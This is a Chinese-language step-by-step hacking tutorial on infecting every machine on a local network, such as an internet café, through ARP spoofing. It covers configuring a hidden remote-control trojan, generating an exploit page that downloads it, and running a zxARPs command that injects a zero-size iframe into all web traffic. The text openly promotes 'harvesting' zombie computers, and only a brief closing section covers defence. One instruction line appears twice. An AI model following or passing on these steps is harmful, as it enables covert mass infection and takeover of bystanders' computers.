網(wǎng)頁掛馬是當今十分流行的入侵手段，這種方式不需要耗費黑客太多的精力，更趨近于守株待兔。不過和守株待兔相比，網(wǎng)頁掛馬的效率可就高出很多了。但是各大安全廠商和用戶的安全意識在不斷提高，網(wǎng)頁掛馬經(jīng)過嚴防死守成功的機率正在逐漸降低。不過現(xiàn)在出現(xiàn)了一種全新的掛馬方式就是ARP欺騙掛馬，這種掛馬的傳播速度要比普通網(wǎng)頁掛馬快上許多。

局域網(wǎng)ARP欺騙掛馬的好處如下：無需入侵網(wǎng)站，只要你的主機處于局域網(wǎng)中即可，這是它最大的優(yōu)點;收獲的肉雞多多，短時間內(nèi)可以收獲數(shù)十臺甚至上百臺肉雞，類似網(wǎng)吧這樣由上百臺電腦組成的局域網(wǎng)是最好的掛馬場所;局域網(wǎng)內(nèi)的用戶訪問任何網(wǎng)站都會中我們的木馬?？戳松厦娴慕榻B，各位是不是已經(jīng)蠢蠢欲動了?

第一步：配置木馬服務(wù)端

我們以“黑洞”木馬為例。運行“黑洞”木馬的Client.exe文件，進入Client.exe的主界面后，點擊“文件→創(chuàng)建DLL插入版本服務(wù)端程序”。

進入服務(wù)端程序的創(chuàng)建界面后，首先勾選“Win NT/2000/XP/2003下隱藏服務(wù)端文件、注冊表、進程和服務(wù)”，然后切換到“連接選項”標簽，在“主機”一欄中填入本機的公網(wǎng)IP地址，端口可以保持默認的“2007”。最后在“連接密碼”處填入用來連接對方的密碼，例如123456。設(shè)置完成后點擊“生成”按鈕，將木馬服務(wù)端保存為muma.exe。

第二步：生成網(wǎng)頁木馬

既然是掛馬，那當然缺不了網(wǎng)頁木馬了。這里我們用“MS07-33網(wǎng)馬生成器”為例。運行“MS07-33網(wǎng)馬生成器”，在“網(wǎng)馬地址”文本框中輸入木馬所在路徑，由于等會我們要自行架設(shè)Http服務(wù)，所以這里應(yīng)該填入“http://192.168.0.2/muma.exe“，其中192.168.0.2是本機在局域網(wǎng)中的IP地址。點擊“生成網(wǎng)馬”按鈕即可生成網(wǎng)馬hackll.htm

第三步：開啟本機Http服務(wù)

要讓局域網(wǎng)中的其他主機能夠訪問到我們的網(wǎng)馬，就要開啟本機的Http服務(wù)。下載baby web server，這是一款簡單的Web服務(wù)器軟件，下載后直接運行，在其主界面中點擊“服務(wù)→設(shè)置”。

將“網(wǎng)頁目錄”設(shè)置為網(wǎng)頁木馬所在的地方，例如C盤根目錄“C:\“。點“確定”回主界面，然后再點“Start”按鈕開啟本機的Http服務(wù)。記得要將木馬服務(wù)端和網(wǎng)頁木馬放到C盤根目錄。

第四步：局域網(wǎng)ARP欺騙掛馬

最后該請我們的主角出場了，就是上文中提到的小工具，這個工具叫zxARPs，是一個通過ARP欺騙實現(xiàn)局域網(wǎng)掛馬的工具。在使用zxARPs前我們要安裝WinPcap，它是網(wǎng)絡(luò)底層驅(qū)動包，沒有它zxARPs就運行不了。

安裝好后將zxARPs放到任意目錄，然后運行“命令提示符”，進入zxARPs所在的目錄，然后輸入命令：zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "
安裝好后將zxARPs放到任意目錄，然后運行“命令提示符”，進入zxARPs所在的目錄，然后輸入命令：zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='http://192.168.0.2/hackll.htm' width=0 height=0>"?；剀嚭髵祚R就成功了。

從現(xiàn)在開始，局域網(wǎng)中的用戶無論訪問什么網(wǎng)站，都會運行我們的網(wǎng)頁木馬，因為zxARPs在用戶打開網(wǎng)頁的同時已經(jīng)將掛馬代碼插入到正常網(wǎng)頁中了。

ARP欺騙掛馬防范技巧

從上文可見zxARPs的功能真的十分強大，但它畢竟是基于ARP欺騙原理的，只要局域網(wǎng)內(nèi)的主機能夠抵御ARP欺騙攻擊，就可以完全無視zxARPs的掛馬方法。

網(wǎng)管將局域網(wǎng)內(nèi)所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載“360ARP防火墻”來抵御ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft)，安裝完成后點擊界面上的“開啟”按鈕就可以讓它保護我們免受ARP欺騙的攻擊了。這時如果有人對你的主機進行ARP欺騙攻擊，我們在可以點擊“記錄”按鈕，查看攻擊者的IP地址。

【編輯推薦】

1. 黑客技術(shù)之木馬隱身術(shù)
2. 強化系統(tǒng)安全從應(yīng)對木馬開始
3. 黑客局限 揭秘網(wǎng)頁木馬四大不足
4. 黑客攻防：網(wǎng)站常見后門方法大總結(jié)
5. 自己動手清除電腦中的木馬程序